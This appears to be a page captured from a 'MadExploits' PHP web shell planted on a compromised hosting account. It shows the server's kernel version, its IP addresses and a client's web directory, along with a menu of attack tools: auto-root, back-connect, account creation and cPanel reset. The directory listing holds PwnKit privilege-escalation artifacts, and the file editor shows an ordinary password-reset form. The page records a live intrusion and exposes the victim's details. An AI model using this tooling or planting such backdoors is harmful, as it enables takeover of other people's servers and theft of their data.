Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 18.221.136.116
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
priyamskitchen /
theme /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
account.php
11.04
KB
-rw-r--r--
forgot-password.php
1.55
KB
-rw-r--r--
index.php
9.07
KB
-rw-r--r--
login.php
2.33
KB
-rw-r--r--
product-data.php
6.26
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
register.php
3.66
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : forgot-password.php
<?php include("includes/header.php");?> <div class="wrap-breadcrumb parallax-breadcrumb" style="background-position: 50% -20.16px;"> <div class="container"> <ul class="breadcrumb"> <li class="home-indx"><a href="index.php"><i class="ti-user"></i></a></li> <li><a href="">Account</a></li> <li><a href="">Forgot Password</a></li> </ul> </div> </div> <div class="ny-action pdh-60 fff"> <div class="container"> <div class="row"> <?php include("includes/account-menu.php");?> <div id="content" class="col-sm-9 form-data"> <h2>Register Account</h2> <p>Enter the e-mail address associated with your account. Click submit to have a password reset link e-mailed to you.</p> <form action="" class="form-horizontal" method="post" accept-charset="utf-8"> <fieldset> <legend>Your E-Mail Address</legend> <div class="form-group required"> <label class="col-sm-2 control-label">E-Mail Address</label> <div class="col-sm-10"> <input type="email" name="email" id="email" placeholder="E-Mail Address" class="form-control" required=""> </div> </div> </fieldset> <div class="buttons clearfix"> <div class="pull-right"> <input type="submit" value="Submit" class="btn btn-lg btn-primary"> </div> </div> </form> </div> </div> </div> <div class="clearfix"></div> <?php include("includes/footer.php");?>
Close